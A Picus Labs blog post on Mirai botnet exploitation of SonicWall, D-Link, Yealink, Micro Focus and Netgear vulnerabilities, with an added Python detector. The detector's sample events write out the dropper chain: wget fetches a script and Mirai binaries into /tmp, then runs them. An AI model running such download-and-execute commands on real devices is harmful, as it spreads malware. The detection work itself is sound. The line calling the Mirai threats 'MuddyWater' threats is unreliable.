Picus Labs | 2 MIN READ

LAST UPDATED ON MARCH 24, 2023

Picus Threat Library Updated for Vulnerability Exploitation Attacks Leveraged by Mirai Botnet Malware

Picus Labs has updated the Picus Threat Library with new vulnerability exploitation attacks leveraged by the Mirai malware, which has been active throughout 2016. Mirai is a botnet malware that transforms Linux-based networked devices into remotely managed bots that can be used in large-scale network attacks as part of a botnet. Its main targets are IoT devices such as IP cameras, routers, switches, and network security devices such as SSL VPN solutions. Mirai variants are built for different CPU architectures, such as x86, ARM, MIPS, PowerPC and SPARC.

New Mirai Campaign Targeting Network Devices

Last month, Unit 42 researchers discovered attacks that exploited the vulnerabilities listed in the following table [1]:

| Vulnerability | Vulnerability Type | Affected Product | CVSS 3.1 Score |
|---|---|---|---|
| Visualdoor | Remote Command Injection | SonicWall “Virtual Office” SSL-VPN | 9.8 Critical |
| CVE-2020-25506 | Remote Command Injection | D-Link DNS-320 Firewall | 9.8 Critical |
| CVE-2021-27561 | Remote Code Execution | Yealink Device Management | 9.8 Critical |
| CVE-2021-22502 | Remote Code Execution | Micro Focus Operation Bridge Reporter (OBR) | 9.8 Critical |
| CVE-2020-26919 | Remote Code Execution | NETGEAR ProSafe JGS516PE Switch | 9.8 Critical |

Upon successful exploitation of one of these vulnerabilities, the attackers attempt to download a malicious shell script by invoking the wget utility on the target device. The downloaded shell script then downloads multiple Mirai binaries that have been compiled for various architectures and runs them one by one.
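As an added detection example (not code from the Picus post or the Unit 42 report), the following Python flags the post-exploitation sequence described above on constructed process-execution events: a shell script fetched with wget or curl, run with a shell, and then several binaries executed straight out of a temp directory. The event format, hostnames and URLs are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-execution events (host, pid, command line), modelled on
# the wget-then-run-each-binary sequence described in the post. Not real telemetry.
SAMPLE_EVENTS = [
    ("cam-01", 101, "wget http://203.0.113.5/bins.sh -O /tmp/bins.sh"),
    ("cam-01", 102, "sh /tmp/bins.sh"),
    ("cam-01", 103, "wget http://203.0.113.5/mirai.arm -O /tmp/mirai.arm"),
    ("cam-01", 104, "chmod +x /tmp/mirai.arm"),
    ("cam-01", 105, "/tmp/mirai.arm"),
    ("cam-01", 106, "wget http://203.0.113.5/mirai.mips -O /tmp/mirai.mips"),
    ("cam-01", 107, "/tmp/mirai.mips"),
    ("cam-01", 108, "wget http://203.0.113.5/mirai.x86 -O /tmp/mirai.x86"),
    ("cam-01", 109, "/tmp/mirai.x86"),
    # Benign host: a firmware download and a locally installed maintenance script.
    ("router-02", 201, "wget https://updates.example.net/firmware.bin -O /tmp/fw.bin"),
    ("router-02", 202, "sh /usr/sbin/health-check.sh"),
]

FETCH_RE = re.compile(r"^(?:wget|curl)\b.*?(https?://\S+)")      # downloader + URL
SCRIPT_RUN_RE = re.compile(r"^(?:sh|bash|ash)\s+(\S+\.sh)\b")    # shell running a .sh
TMP_EXEC_RE = re.compile(r"^(?:/tmp|/var/tmp|/dev/shm)/\S+$")    # direct exec from tmp

def detect_mirai_dropper(events):
    """Return {host: [binaries executed from tmp]} for hosts matching the chain:
    (1) a .sh fetched over HTTP, (2) that script run by a shell, (3) at least two
    distinct binaries then executed from a world-writable temp directory, which is
    the multi-architecture 'run them one by one' behaviour described above."""
    by_host = defaultdict(lambda: {"scripts": set(), "script_run": False, "execs": []})
    for host, _pid, cmd in events:
        st = by_host[host]
        fetch = FETCH_RE.match(cmd)
        if fetch and fetch.group(1).endswith(".sh"):
            st["scripts"].add(fetch.group(1).rsplit("/", 1)[-1])   # remember basename
            continue
        run = SCRIPT_RUN_RE.match(cmd)
        if run and run.group(1).rsplit("/", 1)[-1] in st["scripts"]:
            st["script_run"] = True
        elif st["script_run"] and TMP_EXEC_RE.match(cmd):
            st["execs"].append(cmd)
    return {h: s["execs"] for h, s in by_host.items()
            if s["script_run"] and len(set(s["execs"])) >= 2}
```

The benign router is not flagged because its downloaded file is not a script and the script it runs was never fetched.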

Picus Labs Red Team examined these vulnerabilities and added the following threats to the Picus Threat Library:

| Picus ID | Threat Name | CVE |
|---|---|---|
| 373908 | SonicWall SSL VPN Server Remote Code Execution Vulnerability | |
| 470582 | D-Link DNS320 Firewall Remote Code Execution (RCE) Vulnerability Variant-1 | CVE-2020-25506 |
| 604066 | Yealink Device Management Remote Code Execution (RCE) Vulnerability Variant-1 | CVE-2021-27561 |
| 490108 | Micro Focus Operations Bridge Manager OS Command Injection Variant-2 | CVE-2021-22502 |
| 314732 | Micro Focus Operations Bridge Manager OS Command Injection Variant-1 | CVE-2021-22502 |
| 543188 | Netgear ProSAFE Plus Remote Code Execution (RCE) Vulnerability Variant-1 | CVE-2020-26919 |

Other Threats of Mirai in Picus Threat Library

The Picus Threat Library contains 31 threats of the MuddyWater threat group, including:

  • Mirai Botnet .ELF File Download for ARM Architecture
  • Mirai Botnet .ELF File Download for Power PC Architecture
  • Mirai Botnet .ELF File Download for MIPS Architecture
  • Mirai Botnet .ELF File Download for SPARC Architecture
  • Mirai Botnet .ELF File Download for Intel 80386 Architecture
  • Mirai Botnet .EXE File Download for Windows Operating System

References

[1] https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
